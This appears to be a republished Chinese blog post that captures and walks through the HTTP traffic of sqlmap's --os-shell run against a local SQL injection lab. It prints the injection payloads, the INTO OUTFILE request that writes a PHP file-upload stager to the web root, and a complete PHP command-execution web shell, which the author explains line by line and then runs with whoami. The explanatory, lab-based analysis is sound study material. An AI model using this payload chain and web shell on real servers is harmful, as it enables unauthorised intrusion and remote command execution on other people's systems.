對利用sqlmap獲取os-shell過程的一次抓包分析

時間  2019-11-16
標籤 利用 sqlmap 獲取 shell 過程 一次 抓包 分析 欄目 Unix 简体版
原文   原文鏈接

本地執行完整過程

D:\sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:10:10

[23:10:10] [INFO] resuming back-end DBMS 'mysql'
[23:10:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
---
[23:10:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.37
back-end DBMS: MySQL >= 5.0
[23:10:10] [INFO] going to use a web backdoor for command prompt
[23:10:10] [INFO] fingerprinting the back-end DBMS operating system
[23:10:10] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: E:\www\apache\Apache24\htdocs
[23:10:50] [WARNING] unable to automatically parse any web server path
[23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
[23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
[23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output:    'desktop-ei9lgn7\bxscope'
os-shell>

執行以上過程在本地一共抓到22個http數據包,其中11個請求包,11個響應包,下邊依次對它們進行簡要分析

0x01

請求
GET /SQL/Less-1/?id=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

這次sqlmap只進行了一次簡單的 get 請求,應該是判斷目標是否可達php

值得注意的是這裏的 User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)html

而後本地服務器返回了一個響應數據包,返回正常頁面內容python

響應
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:10 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 721
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"> 
<font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

0x02

請求
GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

這次請求是在如下事件發生後進行的:
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document rootmysql

這次sqlmap在參數id後加了個%5D%5B,轉碼後就是 [],也就是把參數以數組的形式傳遞給了服務端,難道是想讓網站報錯爆出網站路徑?沒看源碼不是很清楚...web

此次返回的響應數據與第一次返回的不一樣sql

響應
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:27 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

0x03

請求
GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d453a5c5c7777775c5c6170616368655c5c41706163686532345c5c6874646f63735c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--%20- HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

會發現第三次請求的參數很長,轉換後以下shell

id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";}?>

利用mysql的 SELECT ... INTO OUTFILE ... LINES TERMINATED BY上傳腳本apache

代碼展開後以下:數組

<?php
if (isset($_REQUEST["upload"])){
    $dir=$_REQUEST["uploadDir"];
    if (phpversion()<'4.1.0'){
        $file=$HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    else{
        $file=$_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }@chmod($dir."/".$file,0755);
    echo "File uploaded";
}
else {
echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";
}?>

提供文件上傳功能服務器

此次返回的響應數據和第二次返回的數據徹底同樣

響應
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"> 
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

第四到八次請求全是用來判斷文件上傳到了哪裏,這裏請求的次數應該是跟0x02中提供的E:/www/apache/Apache24/htdocs/tmpumgnt.php路徑深度有關

0x04

請求
GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
響應
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x05

請求
GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
響應
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 233
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x06

請求
GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
響應
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x07

請求
GET /htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
響應
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x08

請求
GET /tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
響應
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 330
Connection: close
Content-Type: text/html; charset=UTF-8

1   Dumb    Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>

0x09

請求
POST /tmpumgnt.php?id=1 HTTP/1.1
Content-Length: 1334
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Host: 127.0.0.1
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1

--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="uploadDir"

E:\www\apache\Apache24\htdocs\
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="upload"

1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
Content-Type: application/octet-stream

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
--169.254.227.55.1.10780.1558019450.459.1--

代碼展開後:

<?php 
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z)){
    $z=preg_replace('/[, ]+/',',',$z);
    $z=explode(',',$z);
    $z=array_map('trim',$z);
}
else{
    $z=array();
}
$c=$c." 2>&1\n";
function f($n){
    global $z;
    return is_callable($n)and!in_array($n,$z);
}
if(f('system')){
    ob_start();
    system($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('proc_open')){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}
elseif(f('shell_exec')){
    $w=shell_exec($c);
}
elseif(f('passthru')){
    ob_start();
    passthru($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('popen')){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x)){
            $w.=fread($x,512);
        }
    }
    @pclose($x);
}
elseif(f('exec')){
    $w=array();
    exec($c,$w);
    $w=join(chr(10),$w).chr(10);
}
else{
    $w=0;
}
print "<pre>".$w."</pre>";?>

該腳本先從客戶請求中獲取cmd的值賦值給 $c

設置腳本最大執行時間爲無限

設置客戶端斷開鏈接時也不中斷腳本執行

獲取配置文件中禁用的函數列表賦值給 $z

若是禁用的函數列表 $z 不爲空

  • 把列表中的全部英文逗號或者空格所有替換爲英文逗號賦值給 $z
  • 而後按英文逗號分隔把該函數列表轉換爲數組賦值給 $z
  • 去除數組中每一個元素首尾的空白字符賦值給 $z

若是禁用的函數列表爲空,就把 $z 初始化爲空數組

而後 $c=$c." 2>&1\n"

定義函數 f($n)

  • 調用全局變量$z
  • 若是 $n 能夠被調用而且不在數組 $z 中返回true,不然返回false

若是 f('system') 爲 true

  • 打開輸出緩衝
  • 執行cmd命令 $c
  • 獲取緩衝區中的內容賦值給 $w
  • 清除緩衝區並關閉輸出緩衝

不然若是 f('proc_open') 爲 true

  • 好像是建立一個子進程,執行命令,而後把執行結果寫入到管道中
  • 從管道中讀取命令的執行結果賦值給 $w
  • 關閉進程資源

不然若是 f('shell_exec') 爲 true

  • 經過 shell 環境執行命令,將結果返回給 $w

不然若是 f('passthru') 爲 true

  • 打開輸出緩衝
  • 執行命令
  • 將緩衝區的內容賦值給 $w
  • 清楚緩衝區並關閉輸出緩衝

不然若是 f('popen') 爲 true

  • 打開一個指向進程的管道,執行命令,返回一個fopen()相同的文件指針 $x
  • 讀取該指針所指向的資源賦值給 $w
  • 關閉該資源 $x

不然若是 f('exec') 爲 true

  • $w 初始化爲空數組
  • 執行命令並將結果填充到 $w 數組中
  • 將數組 $w 轉換爲用 chr(10) 鏈接的字符串

不然

  • $w = 0

最後 print "<pre>".$w."</pre>"

響應
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8

1   Dumb    DumbFile uploaded

0x0a

請求
GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
響應
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>command execution test 
</pre>

0x0b

請求
GET /tmpbwejn.php?cmd=whoami HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
響應
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:11:08 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>desktop-ei9lgn7\bxscope
</pre>
相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程